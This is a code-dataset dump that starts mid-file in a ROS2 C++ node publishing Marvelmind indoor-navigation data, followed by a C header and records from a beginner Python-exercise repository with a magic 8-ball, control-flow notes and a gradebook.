hedge->rawIMU.gyro_x;\n hedge_imu_raw_msg.gyro_y= hedge->rawIMU.gyro_y;\n hedge_imu_raw_msg.gyro_z= hedge->rawIMU.gyro_z;\n\n hedge_imu_raw_msg.compass_x= hedge->rawIMU.compass_x;\n hedge_imu_raw_msg.compass_y= hedge->rawIMU.compass_y;\n hedge_imu_raw_msg.compass_z= hedge->rawIMU.compass_z;\n\n hedge_imu_raw_msg.timestamp_ms= hedge->rawIMU.timestamp;\n\n hedge->rawIMU.updated= false;\n\n return true;\n\n}\n\nbool MarvelmindNavigation::hedgeIMUFusionReceiveCheck()\n{\n if (!hedge->fusionIMU.updated)\n return false;\n\n hedge_imu_fusion_msg.x_m= hedge->fusionIMU.x/1000.0;\n hedge_imu_fusion_msg.y_m= hedge->fusionIMU.y/1000.0;\n hedge_imu_fusion_msg.z_m= hedge->fusionIMU.z/1000.0;\n\n hedge_imu_fusion_msg.qw= hedge->fusionIMU.qw/10000.0;\n hedge_imu_fusion_msg.qx= hedge->fusionIMU.qx/10000.0;\n hedge_imu_fusion_msg.qy= hedge->fusionIMU.qy/10000.0;\n hedge_imu_fusion_msg.qz= hedge->fusionIMU.qz/10000.0;\n\n hedge_imu_fusion_msg.vx= hedge->fusionIMU.vx/1000.0;\n hedge_imu_fusion_msg.vy= hedge->fusionIMU.vy/1000.0;\n hedge_imu_fusion_msg.vz= hedge->fusionIMU.vz/1000.0;\n\n hedge_imu_fusion_msg.ax= hedge->fusionIMU.ax/1000.0;\n hedge_imu_fusion_msg.ay= hedge->fusionIMU.ay/1000.0;\n hedge_imu_fusion_msg.az= hedge->fusionIMU.az/1000.0;\n\n hedge_imu_fusion_msg.timestamp_ms= hedge->fusionIMU.timestamp;\n\n hedge->fusionIMU.updated= false;\n\n return true;\n}\n\nvoid MarvelmindNavigation::getRawDistance(uint8_t index)\n{\n beacon_raw_distance_msg.address_hedge= hedge->rawDistances.address_hedge;\n beacon_raw_distance_msg.address_beacon= hedge->rawDistances.distances[index].address_beacon;\n beacon_raw_distance_msg.distance_m= hedge->rawDistances.distances[index].distance/1000.0;\n}\n\nbool MarvelmindNavigation::hedgeTelemetryUpdateCheck()\n{\n if (!hedge->telemetry.updated)\n return false;\n\n hedge_telemetry_msg.battery_voltage= hedge->telemetry.vbat_mv/1000.0;\n hedge_telemetry_msg.rssi_dbm= hedge->telemetry.rssi_dbm;\n\n hedge->telemetry.updated= false;\n return true;\n}\n\nbool MarvelmindNavigation::hedgeQualityUpdateCheck()\n{\n if (!hedge->quality.updated)\n return false;\n\n hedge_quality_msg.address= hedge->quality.address;\n hedge_quality_msg.quality_percents= hedge->quality.quality_per;\n\n hedge->quality.updated= false;\n return true;\n}\n\nbool MarvelmindNavigation::marvelmindWaypointUpdateCheck()\n{\n uint8_t i,n;\n uint8_t nUpdated;\n\n if (!hedge->waypoints.updated)\n return false;\n\n nUpdated= 0;\n n= hedge->waypoints.numItems;\n for(i=0;i<n;i++)\n {\n if (!hedge->waypoints.items[i].updated)\n continue;\n\n nUpdated++;\n if (nUpdated == 1)\n {\n marvelmind_waypoint_msg.total_items= n;\n marvelmind_waypoint_msg.item_index= i;\n\n marvelmind_waypoint_msg.movement_type= hedge->waypoints.items[i].movementType;\n marvelmind_waypoint_msg.param1= hedge->waypoints.items[i].param1;\n marvelmind_waypoint_msg.param2= hedge->waypoints.items[i].param2;\n marvelmind_waypoint_msg.param3= hedge->waypoints.items[i].param3;\n\n hedge->waypoints.items[i].updated= false;\n }\n }\n\n if (nUpdated==1)\n {\n hedge->waypoints.updated= false;\n }\n return (nUpdated>0);\n}\n\nvoid MarvelmindNavigation::activateAllPublishers()\n{\n hedge_pos_ang_publisher_->on_activate();\n hedge_pos_publisher_->on_activate();\n hedge_pos_noaddress_publisher_->on_activate();\n beacons_pos_publisher_->on_activate();\n hedge_imu_raw_publisher_->on_activate();\n hedge_imu_fusion_publisher_->on_activate();\n beacon_distance_publisher_->on_activate();\n hedge_telemetry_publisher_->on_activate();\n hedge_quality_publisher_->on_activate();\n marvelmind_waypoint_publisher_->on_activate();\n are_publishers_active_= true;\n}\n\nvoid MarvelmindNavigation::deactivateAllPublishers()\n{\n hedge_pos_ang_publisher_->on_deactivate();\n hedge_pos_publisher_->on_deactivate();\n hedge_pos_noaddress_publisher_->on_deactivate();\n beacons_pos_publisher_->on_deactivate();\n hedge_imu_raw_publisher_->on_deactivate();\n hedge_imu_fusion_publisher_->on_deactivate();\n beacon_distance_publisher_->on_deactivate();\n hedge_telemetry_publisher_->on_deactivate();\n hedge_quality_publisher_->on_deactivate();\n marvelmind_waypoint_publisher_->on_deactivate();\n are_publishers_active_ = false;\n}\n\nvoid MarvelmindNavigation::resetAllPublishers()\n{\n hedge_pos_ang_publisher_.reset();\n hedge_pos_publisher_.reset();\n hedge_pos_noaddress_publisher_.reset();\n beacons_pos_publisher_.reset();\n hedge_imu_raw_publisher_.reset();\n hedge_imu_fusion_publisher_.reset();\n beacon_distance_publisher_.reset();\n hedge_telemetry_publisher_.reset();\n hedge_quality_publisher_.reset();\n marvelmind_waypoint_publisher_.reset();\n are_publishers_active_ = false;\n}\n\nvoid MarvelmindNavigation::setMessageDefaults()\n{\n // default values for position message\n hedge_pos_ang_msg.address= 0;\n hedge_pos_ang_msg.timestamp_ms = 0;\n hedge_pos_ang_msg.x_m = 0.0;\n hedge_pos_ang_msg.y_m = 0.0;\n hedge_pos_ang_msg.z_m = 0.0;\n hedge_pos_ang_msg.flags = (1<<0);// 'data not available' flag\n hedge_pos_ang_msg.angle= 0.0;\n\n hedge_pos_msg.address= 0;\n hedge_pos_msg.timestamp_ms = 0;\n hedge_pos_msg.x_m = 0.0;\n hedge_pos_msg.y_m = 0.0;\n hedge_pos_msg.z_m = 0.0;\n hedge_pos_msg.flags = (1<<0);// 'data not available' flag\n\n hedge_pos_noaddress_msg.timestamp_ms = 0;\n hedge_pos_noaddress_msg.x_m = 0.0;\n hedge_pos_noaddress_msg.y_m = 0.0;\n hedge_pos_noaddress_msg.z_m = 0.0;\n hedge_pos_noaddress_msg.flags = (1<<0);// 'data not available' flag\n\n beacon_pos_msg.address= 0;\n beacon_pos_msg.x_m = 0.0;\n beacon_pos_msg.y_m = 0.0;\n beacon_pos_msg.z_m = 0.0;\n}\n\nvoid MarvelmindNavigation::createPublishers()\n{\n rclcpp::QoS qos(rclcpp::QoSInitialization::from_rmw(rmw_qos_profile_sensor_data));\n\n hedge_pos_ang_publisher_ = this->create_publisher<marvelmind_interfaces::msg::HedgePosAng>(HEDGE_POSITION_WITH_ANGLE_TOPIC_NAME, qos);\n hedge_pos_publisher_ = this->create_publisher<marvelmind_interfaces::msg::HedgePosA>(HEDGE_POSITION_ADDRESSED_TOPIC_NAME, qos);\n hedge_pos_noaddress_publisher_ = this->create_publisher<marvelmind_interfaces::msg::HedgePos>(HEDGE_POSITION_TOPIC_NAME, qos);\n\n beacons_pos_publisher_ = this->create_publisher<marvelmind_interfaces::msg::BeaconPosA>(BEACONS_POSITION_ADDRESSED_TOPIC_NAME, qos);\n\n hedge_imu_raw_publisher_ = this->create_publisher<marvelmind_interfaces::msg::HedgeImuRaw>(HEDGE_IMU_RAW_TOPIC_NAME, qos);\n hedge_imu_fusion_publisher_ = this->create_publisher<marvelmind_interfaces::msg::HedgeImuFusion>(HEDGE_IMU_FUSION_TOPIC_NAME, qos);\n\n beacon_distance_publisher_ = this->create_publisher<marvelmind_interfaces::msg::BeaconDistance>(BEACON_RAW_DISTANCE_TOPIC_NAME, qos);\n\n hedge_telemetry_publisher_ = this->create_publisher<marvelmind_interfaces::msg::HedgeTelemetry>(HEDGE_TELEMETRY_TOPIC_NAME, qos);\n hedge_quality_publisher_ = this->create_publisher<marvelmind_interfaces::msg::HedgeQuality>(HEDGE_QUALITY_TOPIC_NAME, qos);\n\n marvelmind_waypoint_publisher_ = this->create_publisher<marvelmind_interfaces::msg::MarvelmindWaypoint>(MARVELMIND_WAYPOINT_TOPIC_NAME, qos);\n}\n\nvoid MarvelmindNavigation::main_loop()\n{\n // RCLCPP_INFO_STREAM(get_logger(),std::fixed << \"Running main loop at \" << this->now().seconds() );\n\n if (hedge->terminationRequired)\n {\n RCLCPP_INFO_STREAM(get_logger(),std::fixed << \"Shutdown called from hedge->terminationRequired at \" << now().seconds());\n this->shutdown();\n }\n\n if (clock_gettime(CLOCK_REALTIME, &ts) == -1)\n {\n RCLCPP_INFO_STREAM(get_logger(),std::fixed << \"clock_gettime error. Realtime: \" << CLOCK_REALTIME << \" vs ts: \" << ts.tv_sec);\n return;\n }\n ts.tv_sec += 2;\n sem_timedwait(sem,&ts);\n\n if (hedgeReceiveCheck())\n {\n // hedgehog data received\n RCLCPP_INFO(get_logger(), \"Address: %d, timestamp: %d, %d, X=%.3f Y= %.3f Z=%.3f Angle: %.1f flags=%d\",\n (int) hedge_pos_ang_msg.address,\n (int) hedge_pos_ang_msg.timestamp_ms,\n (int) (hedge_pos_ang_msg.timestamp_ms - hedge_timestamp_prev),\n (float) hedge_pos_ang_msg.x_m, (float) hedge_pos_ang_msg.y_m, (float) hedge_pos_ang_msg.z_m,\n (float) hedge_pos_ang_msg.angle,\n (int) hedge_pos_msg.flags);\n if(are_publishers_active_)\n {\n hedge_pos_ang_publisher_->publish(hedge_pos_ang_msg);\n hedge_pos_publisher_->publish(hedge_pos_msg);\n hedge_pos_noaddress_publisher_->publish(hedge_pos_noaddress_msg);\n }\n\n hedge_timestamp_prev= hedge_pos_ang_msg.timestamp_ms;\n }\n\n beaconReadIterations= 0;\n while(beaconReceiveCheck())\n {// stationary beacons data received\n RCLCPP_INFO(get_logger(), \"Stationary beacon: Address: %d, X=%.3f Y= %.3f Z=%.3f\",\n (int) beacon_pos_msg.address,\n (float) beacon_pos_msg.x_m, (float) beacon_pos_msg.y_m, (float) beacon_pos_msg.z_m);\n if(are_publishers_active_)\n {\n beacons_pos_publisher_->publish(beacon_pos_msg);\n }\n\n if ((beaconReadIterations++)>4)\n break;\n }\n\n if (hedgeIMURawReceiveCheck())\n {\n RCLCPP_INFO(get_logger(), \"Raw IMU: Timestamp: %08d, aX=%05d aY=%05d aZ=%05d gX=%05d gY=%05d gZ=%05d cX=%05d cY=%05d cZ=%05d\",\n (int) hedge_imu_raw_msg.timestamp_ms,\n (int) hedge_imu_raw_msg.acc_x, (int) hedge_imu_raw_msg.acc_y, (int) hedge_imu_raw_msg.acc_z,\n (int) hedge_imu_raw_msg.gyro_x, (int) hedge_imu_raw_msg.gyro_y, (int) hedge_imu_raw_msg.gyro_z,\n (int) hedge_imu_raw_msg.compass_x, (int) hedge_imu_raw_msg.compass_y, (int) hedge_imu_raw_msg.compass_z);\n if(are_publishers_active_)\n {\n hedge_imu_raw_publisher_->publish(hedge_imu_raw_msg);\n }\n }\n\n if (hedgeIMUFusionReceiveCheck())\n {\n RCLCPP_INFO(get_logger(), \"IMU fusion: Timestamp: %08d, X=%.3f Y= %.3f Z=%.3f q=%.3f,%.3f,%.3f,%.3f v=%.3f,%.3f,%.3f a=%.3f,%.3f,%.3f\",\n (int) hedge_imu_fusion_msg.timestamp_ms,\n (float) hedge_imu_fusion_msg.x_m, (float) hedge_imu_fusion_msg.y_m, (float) hedge_imu_fusion_msg.z_m,\n (float) hedge_imu_fusion_msg.qw, (float) hedge_imu_fusion_msg.qx, (float) hedge_imu_fusion_msg.qy, (float) hedge_imu_fusion_msg.qz,\n (float) hedge_imu_fusion_msg.vx, (float) hedge_imu_fusion_msg.vy, (float) hedge_imu_fusion_msg.vz,\n (float) hedge_imu_fusion_msg.ax, (float) hedge_imu_fusion_msg.ay, (float) hedge_imu_fusion_msg.az);\n if(are_publishers_active_)\n {\n hedge_imu_fusion_publisher_->publish(hedge_imu_fusion_msg);\n }\n }\n\n if (hedge->rawDistances.updated)\n {\n uint8_t i;\n for(i=0;i<4;i++)\n {\n getRawDistance(i);\n if (beacon_raw_distance_msg.address_beacon != 0)\n {\n RCLCPP_INFO(get_logger(), \"Raw distance: %02d ==> %02d, Distance= %.3f \",\n (int) beacon_raw_distance_msg.address_hedge,\n (int) beacon_raw_distance_msg.address_beacon,\n (float) beacon_raw_distance_msg.distance_m);\n if(are_publishers_active_)\n {\n beacon_distance_publisher_->publish(beacon_raw_distance_msg);\n }\n }\n }\n hedge->rawDistances.updated= false;\n }\n\n if (hedgeTelemetryUpdateCheck())\n {\n RCLCPP_INFO(get_logger(), \"Vbat= %.3f V, RSSI= %02d \",\n (float) hedge_telemetry_msg.battery_voltage,\n (int) hedge_telemetry_msg.rssi_dbm);\n if(are_publishers_active_)\n hedge_telemetry_publisher_->publish(hedge_telemetry_msg);\n }\n\n if (hedgeQualityUpdateCheck())\n {\n RCLCPP_INFO(get_logger(), \"Quality: Address= %d, Quality= %02d %% \",\n (int) hedge_quality_msg.address,\n (int) hedge_quality_msg.quality_percents);\n if(are_publishers_active_)\n hedge_quality_publisher_->publish(hedge_quality_msg);\n }\n\n if (marvelmindWaypointUpdateCheck())\n {\n int n= marvelmind_waypoint_msg.item_index+1;\n RCLCPP_INFO(get_logger(), \"Waypoint %03d/%03d: Type= %03d, Param1= %05d, Param2= %05d, Param3= %05d \",\n (int) n,\n (int) marvelmind_waypoint_msg.total_items, marvelmind_waypoint_msg.movement_type,\n marvelmind_waypoint_msg.param1, marvelmind_waypoint_msg.param2, marvelmind_waypoint_msg.param3);\n if(are_publishers_active_)\n marvelmind_waypoint_publisher_->publish(marvelmind_waypoint_msg);\n }\n\n}\n\n\nint main(int argc, char * argv[])\n{\n // force flush of the stdout buffer.\n // this ensures a correct sync of all prints\n // even when executed simultaneously within the launch file.\n setvbuf(stdout, NULL, _IONBF, BUFSIZ);\n \n rclcpp::init(argc, argv);\n\n rclcpp::executors::SingleThreadedExecutor exe;\n\n std::shared_ptr<MarvelmindNavigation> lc_node = std::make_shared<MarvelmindNavigation>(\"lc_marvel2\", argc, argv);\n \n exe.add_node(lc_node->get_node_base_interface());\n\n exe.spin();\n\n \n \n\n rclcpp::shutdown();\n\n return 0;\n}\n\n"
},
{
"alpha_fraction": 0.7501779198646545,
"alphanum_fraction": 0.7779359221458435,
"avg_line_length": 44.83333206176758,
"blob_id": "259ff2b3ee18d1181688c45dd4e697e6517196fb",
"content_id": "55e93e21cd25db114069a057303b5418e8be9822",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1405,
"license_type": "permissive",
"max_line_length": 104,
"num_lines": 30,
"path": "/marvelmind_nav/include/marvelmind_nav/marvelmind_example.h",
"repo_name": "aminballoon/ros_marvelmind_package",
"src_encoding": "UTF-8",
"text": "#ifndef __MARVELMIND_EXAMPLE_H_\r\n#define __MARVELMIND_EXAMPLE_H_\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <stdbool.h>\r\n#include <stdint.h>\r\n#include \"marvelmind_api.h\"\r\n\r\nbool marvelmindCheckVersionCommand(char *token);\r\nbool marvelmindCheckWakeCommand(char *token1, char *token2);\r\nbool marvelmindCheckSleepCommand(char *token1, char *token2);\r\nbool marvelmindCheckDefaultCommand(char *token1, char *token2);\r\nbool marvelmindCheckTelemetryCommand(char *token1, char *token2);\r\nbool marvelmindCheckSubmapCommand(char *token1, char *token2, char *token3);\r\nbool marvelmindCheckMapCommand(char *token1, char *token2);\r\nbool marvelmindCheckRateCommand(char *token1, char *token2, char *token3);\r\nbool marvelmindCheckUltrasoundCommand(char *token1, char *token2, char *token3);\r\nbool marvelmindCheckAxesCommand(char *token1, char *token2, char *token3, char *token4);\r\nbool marvelmindCheckReadDumpCommand(char *token1, char *token2, char *token3);\r\nbool marvelmindCheckWriteDumpCommand(char *token1, char *token2, char *token3);\r\nbool marvelmindCheckResetCommand(char *token1, char *token2);\r\nbool marvelmindCheckTemperatureCommand(char *token1, char *token2, char *token3);\r\nbool marvelmindCheckSetLocCommand(char *token1, char *token2, char *token3, char *token4, char *token5);\r\n\r\nbool marvelmindCycle();\r\nvoid marvelmindStart();\r\nvoid marvelmindFinish();\r\n\r\n#endif // __MARVELMIND_EXAMPLE_H_\r\n"
}
] | 19 |
kadim-git/Adnominal-possession
|
https://github.com/kadim-git/Adnominal-possession
|
2a433aa919401871f4658ba06d9da25e72e1c1cf
|
1d6a8bb02f2c95030c053e782248ed92be43c051
|
fd02b9a0af179802f6d637f58a4733cdb15d742b
|
refs/heads/master
| 2020-04-15T06:52:15.742495 | 2019-01-23T21:52:04 | 2019-01-23T21:52:04 | 164,476,785 | 1 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6766784191131592,
"alphanum_fraction": 0.6837455630302429,
"avg_line_length": 48.21739196777344,
"blob_id": "2ffd4a03f2d9b3029b85f824c101de5e6193d589",
"content_id": "959d02e874614c881d3c8ceb49297120a8c6d80c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1132,
"license_type": "no_license",
"max_line_length": 171,
"num_lines": 23,
"path": "/ScriptsPy/Script_InterchangableStr.py",
"repo_name": "kadim-git/Adnominal-possession",
"src_encoding": "UTF-8",
"text": "#For each language, this script extracts element InterchangableStr and shows its attributes: Word_changing, Factors affecting, Strategies\nimport xml.etree.ElementTree as ET\ntree = ET.parse('Database_merged_2017_07.xml')\nroot = tree.getroot()\nprint('Lang N, LangID, Interchangable Str N, Word_changing, Factors affecting, Strategies')\nfor langIter in range(len(root)):\n exampleStrats=root[langIter].findall('./GeneralInfo/InterchangeaStrategies/ExampleStr')\n if exampleStrats:\n for exampleIter in range(len(exampleStrats)):\n print(langIter, end=', ')\n print(root[langIter].find('./GeneralInfo/LangID').text, end=', ')\n print(exampleIter+1, end=',')\n \n print(exampleStrats[exampleIter].get('WordChanging'),',', exampleStrats[exampleIter].get('FactorsAffecting'),',', exampleStrats[exampleIter].get('Strategies'))\n else :\n print(langIter, end=', ')\n print(root[langIter].find('./GeneralInfo/LangID').text, end=', ')\n\n print(', , , ')\n \n # print(root[langIter].find('./GeneralInfo/LangID/InterchangeaStrategies/ExampleStr')[0].attrib)\n \n#exit()\n"
},
{
"alpha_fraction": 0.6844196915626526,
"alphanum_fraction": 0.6907790303230286,
"avg_line_length": 51.20833206176758,
"blob_id": "1ecc32e475980a88970798040beb5973a8bc2caa",
"content_id": "b7e699fdd23a1176c48c5deb7743892844325083",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1259,
"license_type": "no_license",
"max_line_length": 177,
"num_lines": 24,
"path": "/ScriptsPy/Script_3_1.py",
"repo_name": "kadim-git/Adnominal-possession",
"src_encoding": "UTF-8",
"text": "#ТThis scrip gives the content of GramDefLabel only for pronominal possession\nimport xml.etree.ElementTree as ET\n#tree = ET.parse('Database_merged_2017_07.xml')\ntree = ET.parse('Database_merged.xml')\nroot = tree.getroot()\nprint('N, LangID, StrategyID/Type, GramDefLabel')\nfoundCounter=0\n#nodes=list(['Possession/PronominalPossession/*','Possession/PronominalPossession/StrategyPronom/StrategyNotFound','Possession/PronominalPossession/StrategyPronomNonCanonical'])\nfor lang in root[:]:\n #tempFound=lang.findall('./Possession/PronominalPossession/StrategyPronom')\n #tempFound=lang.findall('./Possession/PronominalPossession/*')\n tempFound=lang.findall('./Possession/*/*')\n # print(len(tempFound))\n for strat in tempFound:\n tempMorphemePron=strat.findall('./Morphology/*/[@GramDefLabel]')\n #if tempMorphemePron:\n for tempMorpeme in strat.findall('./Morphology/*/[@GramDefLabel]'):\n foundCounter+=1\n print(foundCounter,lang.find('GeneralInfo/LangID').text, end=' ')\n # print(',',strat.attrib,end=' ')\n print(',','ID='+strat.get('StrategyID')+' '+strat.tag,end=' ')\n # print(',',tempMorphemePron.attrib)\n print(',',tempMorpeme.get('GramDefLabel'))\nprint('')\n \n"
},
{
"alpha_fraction": 0.7759336233139038,
"alphanum_fraction": 0.7831950187683105,
"avg_line_length": 72.76923370361328,
"blob_id": "5dfa0cde9cc36cf39f032c173ee86600e6eab16a",
"content_id": "ec6ad152dcce0c19438a303db95aae39c2e5759d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 964,
"license_type": "no_license",
"max_line_length": 180,
"num_lines": 13,
"path": "/ScriptsPy/Script_1_lena.py",
"repo_name": "kadim-git/Adnominal-possession",
"src_encoding": "UTF-8",
"text": "#modified by Lena. This script extracts the number of strategies for every language: Pronominal (including non canonical strategies), Nominal (including non canonical strategies)\nimport xml.etree.ElementTree as ET\ntree = ET.parse('Database_merged_2017_07.xml')\nroot = tree.getroot()\nprint('LangID, PronominalPossession, StrategyNotFound, StrategyPronomNonCanonical, NominalPossession, StrategyNotFound, StrategyNomNotCanonical')\nnodes=list(['Possession/PronominalPossession/*','Possession/PronominalPossession/StrategyNotFound','Possession/PronominalPossession/StrategyPronomNonCanonical'])\nnodes=nodes+['Possession/NominalPossession/*','Possession/NominalPossession/StrategyNotFound','Possession/NominalPossession/StrategyNomNonCanonical']\nfor lang in root:\n print(lang.find('GeneralInfo/LangID').text, end=' ')\n for node in nodes:\n tempFound=lang.findall(node)\n print(',',len(tempFound) if tempFound else 0, end=' ') \n print('')\n \n"
}
] | 3 |
nikolozi2001/negar-s-projects
|
https://github.com/nikolozi2001/negar-s-projects
|
8155c27b3f6f1f3cbeff28242114e23bc2f09c09
|
50047b6c227304f574ab0b4feff0f6fcf52cdb5f
|
f60579efe83dc1a63de8621e53dc4e69e0ef0d04
|
refs/heads/main
| 2023-04-21T21:29:49.475791 | 2021-05-04T18:40:26 | 2021-05-04T18:40:26 | 360,517,578 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7982062697410583,
"alphanum_fraction": 0.8161435127258301,
"avg_line_length": 36.33333206176758,
"blob_id": "5cb2ce83c4146ea5fde67f07ec8e731362c00c34",
"content_id": "06591e3a64b56c8979365ecd765491c2c480191f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 223,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 6,
"path": "/other-materials/Readme.md",
"repo_name": "nikolozi2001/negar-s-projects",
"src_encoding": "UTF-8",
"text": "This is a course from udemy\n\n2021 Complete Python Bootcamp From Zero to Hero in Python\n\nAbout this course\nLearn Python like a Professional Start from the basics and go all the way to creating your own applications and games"
},
{
"alpha_fraction": 0.6322751045227051,
"alphanum_fraction": 0.6494709253311157,
"avg_line_length": 20,
"blob_id": "b1caf948dcd627461a74b2fe6efefe029650d7d8",
"content_id": "7114a26c6d5efb55046712b9f51685df7c091d1f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 756,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 36,
"path": "/first-project/magic8.py",
"repo_name": "nikolozi2001/negar-s-projects",
"src_encoding": "UTF-8",
"text": "import random\nimport time\n\nname = \"Nika\"\n\nquestion = \"Will I win the lottery?\"\n\nanswer = \"\"\n\nrandomNumber = random.randint(1, 9)\n\nif randomNumber == 1:\n print('Yes - definitely.')\nelif randomNumber == 2:\n print(\"It is decidedly so.\")\nelif randomNumber == 3:\n print(\"Without a doubt.\")\nelif randomNumber == 4:\n print(\"Reply hazy, try again.\")\nelif randomNumber == 5:\n print(\"Ask again later.\")\nelif randomNumber == 6:\n print(\"Better not tell you now.\")\nelif randomNumber == 7:\n print(\"My sources say no.\")\nelif randomNumber == 8:\n print(\"Outlook not so good.\")\nelif randomNumber == 9:\n print(\"Very doubtful.\")\nelse:\n answer = \"Error\"\n\nprint(name + \" asks: \" + question)\nprint(\"Magic 8-Ball's answer: \" + answer)\n\ntime.sleep(2)\n"
},
{
"alpha_fraction": 0.5753228068351746,
"alphanum_fraction": 0.6131038069725037,
"avg_line_length": 13.690140724182129,
"blob_id": "7ebbbeb6f30d106c6b237fb2d3c2e74240586984",
"content_id": "71e8ac68a650dd8a29783d735aecdabb77eaace5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2091,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 142,
"path": "/first-project/controlFlow.py",
"repo_name": "nikolozi2001/negar-s-projects",
"src_encoding": "UTF-8",
"text": "def line():\n print(\"--------------------------------------------------\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#Boolean Expressions\n# print(1==1)\n\n# print(1!=1)\n\n# print(2!=1)\n\n# line()\n\n# Task : figure out whether (2=='2') is true or false.why?\n# print(2=='2')\n# print(type(2))\n\n#line()\n# Boolean Variables\n\n# my_variable = True\n# my_variable_2 = 33/3!=22/11\n# print(my_variable)\n# print(my_variable_2)\n\n\n\n#line()\n\n#If Statements\n\n# is_raining = False\n# if (is_raining):\n# print(\"bring an umbrella\")\n\n# isSaturday = False\n# if (isSaturday):\n# print(\"you can wake up late!\")\n\n\n\n\n#line()\n\n#Age Control Task\n\n# age = 15\n\n# if age<=13:\n# print(\"you're not allowed in the cinema!\")\n\n\n\n#line()\n\n#print(\"AND Operator -> and combines two boolean expressions and \n# evaluates as True if both its components are True, but False otherwise.\")\n\n# and_1 = (2 < 0) and True \n# print(and_1)\n\n\n\n\n#line()\n\n#print(\"OR Operator -> combines two expressions into a larger expression \n# that is True if either component is True.\")\n\n# or_1 = (1 - 1 == 0) or False\n# or_2 = (2 < 0) or True \n# or_3 = (3 == 8) or (3 > 4) \n\n# print(or_1)\n# print(or_2)\n# print(or_3)\n\n\nline()\n#print(\"NOT Operator -> when applied to any boolean expression, it\n# reverses the boolean value.\")\n\n\n# print(not (True == False))\n# print(not 2 == 2)\n\n# not_1 = not 1 > 4\n# print(not_1)\n\n\n\n\n\n\n#else statements:\nage = 12\nif (age >= 13):\n print(\"Access granted.\")\nelse:\n print(\"Sorry, you must be 13 or older to watch this movie.\")\n\n\n\n\n\n#Else If Statements\n\nprint(\"Thank you for the donation!\")\ndonation = 5678\nif (donation >= 1000):\n print(\"You've achieved platinum status\")\nelif (donation >= 500):\n print(\"You've achieved gold donor status\")\nelif (donation >= 100):\n print(\"You've achieved silver donor status\")\nelse:\n print(\"You've achieved bronze donor status\")\n\n# if (donation >= 1000):\n# print(\"You've achieved platinum status\")\n# if (donation >= 500):\n# print(\"You've achieved gold donor status\")\n# if (donation >= 100):\n# print(\"You've achieved silver donor status\")\n# else:\n# print(\"You've achieved bronze donor status\")\n\n\n\n "
},
{
"alpha_fraction": 0.6876190304756165,
"alphanum_fraction": 0.7200000286102295,
"avg_line_length": 20.040000915527344,
"blob_id": "d9f75c09489487ad2f7babf8266936a5041068f0",
"content_id": "58e777c050b54227b1c94fd3e2af683e444d7118",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 525,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 25,
"path": "/second-project/GradeBook.py",
"repo_name": "nikolozi2001/negar-s-projects",
"src_encoding": "UTF-8",
"text": "subjects = [\"phisics\", \"calculus\", \"poetry\", \"history\"]\ngrades = [98, 97, 85, 88]\n\nGradeBook = zip(subjects,grades)\nprint(list(GradeBook))\n\n#added more subjects\n\nsubjects.append(\"computer science\")\ngrades.append(100)\n\nGradeBook = zip(subjects,grades)\nprint(list(GradeBook))\n\ngrade_book = list(GradeBook)\n\ngrade_book.append([\"visual arts\", 93])\n# (7) modify gradebook\n\ngrades[4] += 5\nprint(list(grade_book))\n\n#here starts last semester gradebook\n\nsubjects2 = [\"ethical hacking\", \"cyber security\", \"IoT\", \"artifical intellect\"]"
},
{
"alpha_fraction": 0.4893617033958435,
"alphanum_fraction": 0.5531914830207825,
"avg_line_length": 15.269230842590332,
"blob_id": "fca6cda63157feac119655fad985ea38db3662bb",
"content_id": "b6f59dc36d7e73e06d80dedaa74cb6c4cb9a449d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 423,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 26,
"path": "/other-materials/learn.py",
"repo_name": "nikolozi2001/negar-s-projects",
"src_encoding": "UTF-8",
"text": "# Task1 from docs\n\n# names = ['Felix', 'Aaron']\n# ages = [19, 16]\n\n\n\n# name_one = ['Felix is', 19]\n# print(name_one)\n\n# name_two = ['Aaron is', 16]\n# print(name_two)\n\n# names_and_ages = [['Felix', 19], ['Aaron', 16]]\n# print(names_and_ages)\n\n# nameAndAges = {'Felix':19, 'Aaron':16}\n# print(nameAndAges)\n\nx = [1, 2, 3]\ny = [4, 5, 6]\nzipped = zip(x, y)\nlist(zipped)\n\nx2, y2 = zip(*zip(x, y))\nx == list(x2) and y == list(y2)\n"
},
{
"alpha_fraction": 0.8095238208770752,
"alphanum_fraction": 0.8095238208770752,
"avg_line_length": 30,
"blob_id": "d7c44b7eb7ea4145bbba12dc057ac272932c8c52",
"content_id": "4dc838224e02b3c464385e4fad7510ddb6c888ad",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 63,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 2,
"path": "/README.md",
"repo_name": "nikolozi2001/negar-s-projects",
"src_encoding": "UTF-8",
"text": "# negar-s-projects\nCodecademy Machine Learning and AI/Tbilisi \n"
},
{
"alpha_fraction": 0.6666666865348816,
"alphanum_fraction": 0.7129629850387573,
"avg_line_length": 31.100000381469727,
"blob_id": "80207d000b2a6669b536bc97150500f9dd426759",
"content_id": "044f453d122b065099ff7ae5542f3452ed459cee",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 324,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 10,
"path": "/second-project/search-trends.py",
"repo_name": "nikolozi2001/negar-s-projects",
"src_encoding": "UTF-8",
